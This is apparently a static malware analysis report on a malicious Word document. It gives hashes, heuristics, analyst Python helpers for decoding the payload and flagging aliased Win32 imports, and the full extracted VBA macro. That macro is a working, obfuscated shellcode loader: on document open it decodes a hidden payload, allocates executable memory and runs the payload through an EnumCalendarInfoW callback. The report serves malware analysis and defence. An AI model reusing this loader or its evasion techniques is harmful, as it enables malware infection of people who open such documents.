Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 2cda0d95cf4482ea…

MALICIOUS

Office (OLE)

Size: 142.0 KB
Created: 2016-11-03 12:57:00
Authoring application: Microsoft Office Word
First seen: 2016-12-03
MD5: c49c6fe53bf6f7bbb48d4623ab00a316
SHA-1: a9da064c1757acff31325b1b1138a9c118b26e11
SHA-256: 2cda0d95cf4482eac230538ac6986cb8bc2aa84708324955a0149bedab60ee97
Risk Score: 110

Malware Insights

MITRE ATT&CK
T1059.005 Command and Scripting Interpreter: Visual Basic
T1204.002 User Execution: Malicious File

The sample is a Microsoft Word document carrying VBA macros (OLE_VBA_MACROS heuristic). Execution starts in Document_Open, which calls Sub oryalist in ThisDocument. oryalist reads the ControlTipText of a control on the UserForm module "disposable", keeps its last 7368 characters and hands them to baron.cannibalize, a hand-rolled base64 decoder that first adds 4 to every byte and emits 5526 bytes of payload. Function hoc then calls VirtualAllocEx (imported under the alias "segregation") on the current process (handle -1) for 7397 bytes with MEM_COMMIT and PAGE_EXECUTE_READWRITE (the constants 4096 and 64 are assembled from small arithmetic), copies 5538 bytes into that buffer with RtlMoveMemory ("contrasted"), and oryalist finally calls EnumCalendarInfoW ("droger") with the buffer address plus a fixed offset (1280 under 64-bit Office, 3677 under 32-bit) as the enumeration callback, so the decoded bytes execute as shellcode without any CreateThread call. Every Win32 import is renamed through Declare ... Alias and surrounded by lyric-style comments, dead string concatenation and never-taken branches; the only occurrence of "VirtualAlloc" in the source is the Alias string "VirtualAllocEx", which is what the SC_STR_VIRTUALALLOC heuristic matched. Sub IterateOpenForms and Sub footer are unreferenced filler. The encoded payload lives in the form's control properties rather than in the extracted macros.bas, so any download URL or second-stage behaviour sits inside the shellcode and is not visible from the VBA alone; the ClamAV name Doc.Dropper.Agent-1817346 classifies it as a dropper.
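The decoder below is an added analyst helper, not code from the sample or from this report. It re-implements baron.cannibalize in Python so the shellcode can be recovered offline once the ControlTipText string has been dumped from the UserForm stream: add 4 to every byte, then run a base64 decode whose table, like the macro's 256-entry array, maps anything outside A-Z a-z 0-9 + / to 0 (so an '=' after the shift decodes as a zero sextet). The encoder and the "Hello, world" input are constructed here for demonstration only; the constants are read off the VBA above.

```python
"""Python re-implementation of the sample's payload decoder (analyst tooling)."""
import base64

PAYLOAD_CHARS = 7368          # Right(ControlTipText, 7368) in Sub oryalist
PAYLOAD_BYTES = 5526          # 7368 / 4 * 3, the size of caretaker(5525)
# Offset added to the buffer address before it is passed to EnumCalendarInfoW
# as the callback: 65+21-20+1214 under 64-bit Office, (1+22+483)+3171 under 32-bit.
ENTRY_OFFSET = {"win64": 1280, "win32": 3677}


def _sextet_table():
    """Mirror of the VBA array condylura(255); unmapped bytes stay 0."""
    table = [0] * 256
    for ch in range(256):
        if 65 <= ch <= 90:          # 'A'..'Z'
            table[ch] = ch - 65
        elif 97 <= ch <= 122:       # 'a'..'z'
            table[ch] = ch - 71
        elif 48 <= ch <= 57:        # '0'..'9'
            table[ch] = ch + 4
        elif ch == 43:              # '+'
            table[ch] = 62
        elif ch == 47:              # '/'
            table[ch] = 63
    return table


def cannibalize_decode(blob):
    """Shift each character by +4, then decode 4 chars -> 3 bytes exactly as the macro does."""
    if len(blob) % 4:
        raise ValueError("the macro only consumes whole 4-character groups")
    table = _sextet_table()
    # The VBA does AscW() then +4 into a Byte array; the mask is a guard for
    # non-ASCII input, which the sample's data does not contain.
    shifted = [(ord(ch) + 4) & 0xFF for ch in blob]
    out = bytearray()
    for i in range(0, len(shifted), 4):
        a, b, c, d = (table[x] for x in shifted[i:i + 4])
        # endosmosis/im/parathelypteris hold i*262144, i*4096, i*64: a 24-bit group
        group = (a << 18) | (b << 12) | (c << 6) | d
        # twins=0xFF0000, ashcolored=0xFF00, anchoritic=0xFF split it back into bytes
        out += bytes(((group >> 16) & 0xFF, (group >> 8) & 0xFF, group & 0xFF))
    return bytes(out)


def cannibalize_encode(payload):
    """Inverse transform, constructed here only to build demo input; the sample has no encoder."""
    b64 = base64.b64encode(payload).decode("ascii")
    return "".join(chr(ord(ch) - 4) for ch in b64)


def decode_tooltip(control_tip_text):
    """Apply the macro's Right(..., 7368) slice and decode the result."""
    blob = control_tip_text[-PAYLOAD_CHARS:]
    if len(blob) != PAYLOAD_CHARS:
        raise ValueError("tooltip is shorter than the 7368 characters the macro expects")
    return cannibalize_decode(blob)


if __name__ == "__main__":
    # Constructed demo: a dummy payload encoded the way the macro expects.
    demo = cannibalize_encode(b"Hello, world")
    print("encoded:", demo)
    print("decoded:", cannibalize_decode(demo))       # b'Hello, world'
    print("entry offsets:", ENTRY_OFFSET)
```

To use it on the real sample, extract the UserForm's control properties (for example from the `disposable` form streams with oletools), take the ControlTipText of the control that BoundValue("Tab2") resolves to, and pass it to decode_tooltip; the first PAYLOAD_BYTES of output are what RtlMoveMemory copies, and the callback entry is at ENTRY_OFFSET for the Office bitness that opened the document.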

Heuristics (5)

  • ClamAV: Doc.Dropper.Agent-1817346 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Dropper.Agent-1817346
  • Reference to VirtualAlloc API medium SC_STR_VIRTUALALLOC
    Reference to VirtualAlloc API
  • VBA macros detected medium 1 related finding OLE_VBA_MACROS
    Document contains VBA macro code
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    End Function
    Private Sub Document_Open()
    Dim fibrocalcific As Integer
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    All eight URLs below were found in document text (OLE body). They are XMP/RDF metadata namespace identifiers (Adobe XMP, RDF syntax, Dublin Core, Camera Raw, Photoshop), typically carried in the XMP metadata of an embedded image; none appears in the macro source and none is a network indicator for this sample.
    • http://ns.adobe.com/xap/1.0/
    • http://www.w3.org/1999/02/22-rdf-syntax-ns#
    • http://purl.org/dc/elements/1.1/
    • http://ns.adobe.com/xap/1.0/mm/
    • http://ns.adobe.com/xap/1.0/sType/ResourceEvent#
    • http://ns.adobe.com/xap/1.0/sType/ResourceRef#
    • http://ns.adobe.com/camera-raw-settings/1.0/
    • http://ns.adobe.com/photoshop/1.0/
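The heuristics above key on strings, and this sample shows why call-site scanning is not enough: every Win32 import gets a random VBA-side name (segregation, contrasted, droger) and the real export is only visible in the Alias clause of the Declare statement. The following is an added triage helper written for this report, not code from the sample or from oletools; it pulls every Declare out of decoded VBA source, resolves the alias, and flags the exports an analyst cares about. The two watch-lists are my own assumption, and the sample input is a handful of Declare lines copied from the extracted module "baron" below.

```python
"""Resolve Declare ... Alias imports in decoded VBA and flag injection-related APIs."""
import re

# Declare [PtrSafe] Function|Sub <vbaName> Lib "<dll>" [Alias "<export>"]
_DECLARE_RE = re.compile(
    r'\bDeclare\s+(?:PtrSafe\s+)?(?:Function|Sub)\s+(\w+)\s+'
    r'Lib\s+"([^"]+)"(?:\s+Alias\s+"([^"]+)")?',
    re.IGNORECASE,
)

# Assumed watch-lists (analyst's choice, not defined by the report): APIs that
# allocate or write executable memory, and enumeration APIs whose callback
# pointer can be aimed at a buffer to run shellcode without CreateThread.
MEMORY_APIS = {
    "VirtualAlloc", "VirtualAllocEx", "RtlMoveMemory", "WriteProcessMemory",
    "CreateThread", "CreateRemoteThread", "NtAllocateVirtualMemory",
}
CALLBACK_APIS = {
    "EnumCalendarInfoW", "EnumCalendarInfoA", "EnumSystemLocalesW",
    "EnumDateFormatsW", "EnumWindows", "EnumChildWindows",
}


def api_declares(vba_source):
    """Map VBA-side name -> (dll, real export); without an Alias the export is the VBA name."""
    found = {}
    for m in _DECLARE_RE.finditer(vba_source):
        vba_name, dll, alias = m.groups()
        found[vba_name] = (dll.lower(), alias or vba_name)
    return found


def triage(vba_source):
    """Return (memory APIs hit, callback APIs hit) as sorted lists of real export names."""
    exports = {export for _dll, export in api_declares(vba_source).values()}
    return sorted(exports & MEMORY_APIS), sorted(exports & CALLBACK_APIS)


def alias_map(vba_source):
    """Reverse lookup for reading the macro: real export -> the VBA names hiding it."""
    rev = {}
    for vba_name, (_dll, export) in api_declares(vba_source).items():
        rev.setdefault(export, []).append(vba_name)
    return {export: sorted(names) for export, names in rev.items()}


# Sample input: Declare lines copied from the extracted module "baron"
# (64-bit branch plus the 32-bit alias for VirtualAllocEx), including one of
# the lyric comments the sample interleaves between declarations.
SAMPLE_VBA = '''
'have mercy please God erase us
Public Declare PtrSafe Function maniacal Lib "user32" Alias "OpenClipboard" (donnybrook As LongPtr) As Boolean
Public  Declare PtrSafe Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (unsought As Any, capriccioso As Any, ByVal bifurcated As LongPtr)
Public  Declare PtrSafe Function segregation Lib "kernel32" Alias "VirtualAllocEx" (bonanza As LongPtr, ByVal twitting As LongPtr, ByVal cadence As LongPtr, ByVal fiesta As LongPtr, ByVal firewall As LongPtr) As LongPtr
Public  Declare PtrSafe Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal ceremonialism As Any, ByVal carman As Any, ByVal sapotaceae As Any, ByVal disjunct As Any) As LongPtr
Public Declare Function morphea Lib "user32" Alias "SetParent" (ByVal alate As Long, ByVal chaplain As Long, bargello As Long) As Long
Public Declare Function segregation Lib "kernel32" Alias "VirtualAllocEx" (rapaciousness As Long, ByVal hellion As Long, ByVal kinfolk As Long, ByVal groschen As Long, ByVal citation As Long) As Long
'''

if __name__ == "__main__":
    mem, cb = triage(SAMPLE_VBA)
    print("memory APIs:  ", mem)     # ['RtlMoveMemory', 'VirtualAllocEx']
    print("callback APIs:", cb)      # ['EnumCalendarInfoW']
    print("alias map:    ", alias_map(SAMPLE_VBA))
```

Run it over the full macros.bas (for example the output of `olevba --decode`) rather than this excerpt; the alias map then tells you that a call such as droger(cuckoo, 2048, 1, 1) in oryalist is EnumCalendarInfoW with the shellcode address as its callback argument, which is the line to pivot on in a sandbox trace.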

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 12997 bytes
SHA-256: 8ff5671a478ba032ecc76b6518387f7f5cbecfb546f9bd2c5f10b1d53a90fd92
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Sub oryalist()
Dim platinum As Long
Dim stupe As Variant
Set saxe = disposable.whitefly.BoundValue("Tab2")
proved = saxe.ControlTipText
shamefacedly = 7368
falco = Right(proved, shamefacedly)
basket = baron.cannibalize(falco)
deterioration = 61
commentator = 88
If deterioration + commentator < 15 Then
deterioration = Mid("beaumontcoapprovingly", 9, 2) & Right$("sympatheticelos", 4) & Left("tatwanton", 3)
infrequently = "advoutry"
currentness = Left("azpalms", 2) & Right$("ammodytesymia", 4)
Else
lucus = lucus * 1
commentator = 85
End If

dipole = UCase$("eM") & Right$("avocationalbroi", 4) & Mid("magnetdereramber", 7, 5)
hobbyhorse = UCase$("bL") & Mid("bacteriolysisueeyrelationships", 14, 4) & LCase$("ed")
#If VBA6 And Win64 Then
Dim counted As Byte
Dim frontbencher As shamrock
Dim rien As LongPtr
frontbencher.elseifstatement = 65 - 65
Dim larcenist As Integer
#Else
Dim freestanding As Long
frontbencher = 0
Dim anurous As String
Dim rien As Long
#End If
patriarchate = 0
niff = "tr" & UCase$("UCKlinG")
sequitur = 116 - 42 - 54 + 4076
molarity = 74
josh = 93
If molarity + josh < 10 Then
molarity = Right$("foundedhet", 3) & Right$("groupereroge", 5) & "neity"
acrophobia = lamasery + 492
footrace = Mid("woodshedtetselfaddressed", 9, 3) & UCase$("RaClIniS")
Else
lamasery = lucus + 171
josh = 12
End If

aleurites = Mid("charlemagneemanproductive", 12, 4) & "cipati" & "on"
armband = LCase$("mU") & "ff"
amphibrach = "asterismal"
retina = 63
nerita = 83
If retina + nerita < 28 Then
retina = Left("afbullace", 2) & "firm"
pontem = "hated"
piercingly = Left("cuephedra", 2) & UCase$("SkEE") & "l"
Else
psychomancy = psychomancy
nerita = 43
End If

gempylidae = basket
expeditionary = "mite"
rien = hoc(gempylidae)
colton = Right$("chiefin", 2) & Mid("airtighteffaagas", 9, 4) & Left("ceablechatterer", 6)
ulatrophia = "neurology"
#If VBA6 And Win64 Then
Dim particulate As Integer
anthology = "hist"
armis = "nicety"
subdepartment = 65 + 21 - 20 + 1214
#ElseIf Win32 Then
oldfashioned = "almightiness"
drawnout = Right$("figbirdac", 2) & Mid("rosinweedcentinfluenza", 10, 4) & Left("orbehavior", 2)
allowances = "frost"
shuffling = 1 + 22 + 483
subdepartment = shuffling + 3171

#End If
Dim practicable As String
Dim ductless As Integer
Dim incensebreathing As Long
incensebreathing = 2048
Dim cuckoo As Long
cuckoo = rien + subdepartment
Dim abusive As Long
abusive = 63 - 62
cautiously = droger(cuckoo, incensebreathing, abusive, abusive)
bewilder = 8
While bewilder < 13
befringed = Left("coaurea", 2) & LCase$("nCuR") & LCase$("rent")
arvicola = "sicilian"
bewilder = bewilder + 1
lucus = lucus + 94
Wend

End Sub

Function hoc(artfully)
Dim piqueria As Byte
Dim anaclisis As String
Dim issueless As Long
contrasted issueless, ByVal VarPtr(artfully) + 8, 4
Dim dram As Variant
Dim subnormality As Long
Dim heiress As Long
adv = 0
delaware = 15 + 51 - 67
impedite = 11 - 11
infrequently = "bunter"

infrequently = "hardhitting"

alstroemeria = 117 - 106 - 22 + 4107
washstand = segregation(ByVal delaware, impedite, 7397, alstroemeria, 64)
psychomancy = pontem

contrasted heiress, ByVal VarPtr(washstand) + 8, 4
psychomancy = pontem

contrasted ByVal heiress, ByVal issueless, 5538
dud = 73
boniness = 70
If dud + boniness < 1 Then
dud = LCase$("pe") & UCase$("CCAbLE")
infrequently = "cursitor"
proclamation = Mid("chandifrgomphotheriidae", 7, 2) & Left("ecklselfabasement", 4) & Mid("statesmanshipeaccused", 14, 1)
Else
lucus = lamasery + 215
boniness = 48
End If

hoc = heiress
End Function
Private Sub Document_Open()
Dim fibrocalcific As Integer
Dim individual As Integer
grue = "vara"
oryalist
chalice = 91
neat = 77
If chalice + neat < 17 Then
chalice = "quo" & "dlibe" & UCase$("T")
lucus = acrophobia \ 356
corroborant = LCase$("DEP") & Left("ositorcardiospermum", 6)
Else
lucus = acrophobia / 234
neat = 22
End If
End Sub
Sub IterateOpenForms()
    Dim frm As Form
    
    For Each frm In Forms
        'Print the name of the referenced form to the Immediate window
        Debug.Print frm.Name
    Next frm
End Sub


Attribute VB_Name = "baron"
'I'd like to think there's more something more
#If VBA6 And Win64 Then
'I keep telling myself that there's something more
Public Type shamrock
'so if it all fails just throw it back in my face and bury me
elseifstatement As LongPtr
'I can't watch things further complicate
End Type
'have mercy please God erase us
Public Declare PtrSafe Function maniacal Lib "user32" Alias "OpenClipboard" (donnybrook As LongPtr) As Boolean
'I'd like to think there's more something more
Public Declare PtrSafe Function aestas Lib "kernel32" Alias "Sleep" (blacksnake As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public Declare PtrSafe Function paleomammalogy Lib "user32" Alias "SetParent" (ByVal blessed As LongPtr, ByVal defenselessness As LongPtr,marplot As LongPtr) As LongPtr
'I can't watch things further complicate
Public Declare PtrSafe Function cumulatively Lib "user32" Alias "GetUpdateRect" (magician As LongPtr, llama As LongPtr,coccidae As LongPtr) As Boolean
'I hope that I don't bore you while I whine about it
Public  Declare PtrSafe Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (unsought As Any, capriccioso As Any, ByVal bifurcated As LongPtr)
'all the thoughts in my head are constantly .. haunting me
Public  Declare PtrSafe Function segregation Lib "kernel32" Alias "VirtualAllocEx" (bonanza As LongPtr, ByVal twitting As LongPtr, ByVal cadence As LongPtr, ByVal fiesta As LongPtr, ByVal firewall As LongPtr) As LongPtr
'I'm lost in this place it's such a waste
Public  Declare PtrSafe Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal ceremonialism As Any, ByVal carman As Any, ByVal sapotaceae As Any, ByVal disjunct As Any) As LongPtr
'I hope you won't be saddened while I cry about it
Public Declare PtrSafe Function conclave Lib "user32" Alias "EndPaint" (catechetical As LongPtr,memorials As LongPtr) As LongPtr
'I keep telling myself that there's something more

'have mercy please God erase us
#Else
'so if it all fails just throw it back in my face and bury me
Public Declare Function morphea Lib "user32" Alias "SetParent" (ByVal alate As Long, ByVal chaplain As Long, bargello As Long) As Long
'have mercy please God erase us
Public Declare Function enthusiasm Lib "user32" Alias "GetUpdateRect" (acer As Long, pioneer As Long, dominique As Long) As Boolean
'so if it all fails just throw it back in my face and bury me
Public Declare Function segregation Lib "kernel32" Alias "VirtualAllocEx" (rapaciousness As Long, ByVal hellion As Long, ByVal kinfolk As Long, ByVal groschen As Long, ByVal citation As Long) As Long
'I hope you won't be saddened while I cry about it
Public Declare Function hitting Lib "user32" Alias "EndPaint" (patzer As Long, archidiaconal As Long) As Long
'so if it all fails just throw it back in my face and bury me
Public Declare Function balldress Lib "kernel32" Alias "Sleep" (sundrops As Long)
'so if it all fails just throw it back in my face and bury me
Public Declare Function droger Lib "kernel32" Alias "EnumCalendarInfoW" (ByVal selfexpression As Any, ByVal caruncle As Any, ByVal hamilton As Any, ByVal associative As Any) As Long
'I keep telling myself that there's something more
Public Declare Function falsehood Lib "user32" Alias "OpenClipboard" (grudgingly As Long) As Boolean
'I'd like to think there's more something more
Public Declare Sub contrasted Lib "ntdll.dll" Alias "RtlMoveMemory" (accelerando As Any, nighthawk As Any, ByVal airfield As Long)
'I can't watch things further complicate

'have mercy please God erase us
#End If
'so if it all fails just throw it back in my face and bury me
Function answering(bgirl, lettre)
answering = bgirl * lettre
End Function
Function noli(lightsomeness, irradiate)
noli = lightsomeness And irradiate
End Function
Sub footer()
    Dim cSection As Section
    With ActiveDocument
        For Each cSection In .Sections
            cHeader = cSection.Headers(wdHeaderFooterEvenPages)
            If Not cSection.Headers(wdHeaderFooterEvenPages).Exists Then
                cSection.PageSetup.OddAndEvenPagesHeaderFooter = True
                cSection.Headers(wdHeaderFooterEvenPages).Range.Text _
                    = "Section " & cSection.Index & " of " & .FullName
                cSection.Headers(wdHeaderFooterEvenPages).Range. _
                    Style = "Even Footer"
            End If
        Next cSection
    End With
End Sub

Function cannibalize(cleanlimbed) As String
Dim acaulescent As Long
Dim im(63) As Long
Dim increasingly As Long
Dim asphyxiate As Long

acrophobia = lamasery + 462

Dim parathelypteris(63) As Long
Dim caretaker(5525) As Byte
Dim commedian As Integer
Dim agamic() As Byte
Dim father As String

Dim austere As Long
Dim acetous As String

Dim condylura(255) As Byte
Dim learner As String
Dim endosmosis(63) As Long
Dim naik As Long
acrophobia = lucus \ 74

caracole = 262144
Dim intervert As Variant

blowoff = 26 + 48 - 11
insatiably = 16515072
burglar = 45 + 63 - 63 + 258003
noncombinative = 4096
request = 101 + 65 + 77 - 179
dantescan = 65536
ashcolored = 65280
twins = 54 + 16711626
Dim menstruum As Long

contest = 256
Dim cannibalism As Long

anchoritic = 255
biologism = 4032
Dim mithai As Variant
Dim selfconvicted(7367) As Byte
pengo = 75 + 31 + 7262
For handed = 1 To pengo
meaninglessness = Mid(cleanlimbed, handed, 1)
arginine = Right$("clamydosporeva", 2) & "lerianaceae"
ingathering = "epi" & Left("centeequilibrio", 5) & UCase$("R")
polack = AscW(meaninglessness)
selfconvicted(handed - 1) = polack
Next
Dim apprenticeship As Variant
For serologic = 22 To 72
buoyantly = 72
acrophobia = lucus * 4
doorkeeper = "ta" & "xicab"
doorkeeper = Left("maromniscient", 3) & Mid("leechesbleizingabnormous", 8, 8)
Next serologic

sculptural = 7367
daniel = 124 - 89
For ligand = 0 To sculptural
selfconvicted(ligand) = selfconvicted(ligand) + 4
Next ligand
plebiscitum = 51
andosite = 100
If plebiscitum + andosite < 8 Then
plebiscitum = LCase$("COb") & Left("itidaarsenopyrite", 5) & UCase$("E")
lamasery = acrophobia - 433
limicolae = UCase$("dEfl") & Mid("campingagratimatchmaker", 8, 6) & "on"
Else
lamasery = lucus And 385
andosite = 17
End If

commedian = 0
antheridium = 122
threepenny = 255
For austere = 0 To threepenny
If (austere >= 65) And (austere <= 90) Then
condylura(austere) = austere - 65
ElseIf (austere >= 97) And (austere <= 122) Then
condylura(austere) = austere - 71
ElseIf (austere >= 48) And (austere <= 57) Then
condylura(austere) = austere + 4
ElseIf austere = 43 Then
condylura(austere) = 62
ElseIf austere = 47 Then
condylura(austere) = 63
End If
Next austere
For austere = 0 To 63
parathelypteris(austere) = answering(austere, request)
im(austere) = answering(austere, noncombinative)
endosmosis(austere) = answering(austere, caracole)
Next austere
conviviality = 3
While conviviality < 8
trebuket = Left("atalfresco", 2) & LCase$("tentiONal")
dactylonomy = "motivated"
conviviality = conviviality + 1
lamasery = lamasery - 260
Wend

agamic = selfconvicted
disputatiously = 66 - 78 + 16
hyponymy = 7
While hyponymy < 11
newness = "bye"
naughtiness = "shutterbug"
hyponymy = hyponymy + 1
infrequently = pontem
Wend

nanometer = 3
psychomancy = "cervix"

lamasery = lucus \ 169

amazingly = nanometer + 1
octopodidae = 68 + 125 - 71 - 120
For naik = 0 To sculptural
skoal = agamic(naik)
increasingly = endosmosis(condylura(skoal)) _
 + im(condylura(agamic(naik + 1))) + parathelypteris(condylura(agamic(naik + 2))) + condylura(agamic(naik + nanometer))
austere = noli(increasingly, twins)
caretaker(acaulescent) = potboiler(austere, dantescan)
austere = noli(increasingly, ashcolored)
caretaker(acaulescent + 1) = potboiler(austere, contest)
caretaker(acaulescent + octopodidae) = noli(increasingly, anchoritic)
acaulescent = acaulescent + octopodidae + 1
naik = naik + 3
Next
cannibalize = caretaker
End Function

Function potboiler(dolman, epergne)
potboiler = dolman \ epergne
End Function


Attribute VB_Name = "disposable"
Attribute VB_Base = "0{A38A586D-A115-4891-AAE1-18CF1CE1B13A}{4EC95B0F-1E9D-4FA9-B143-1E648A1B958B}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False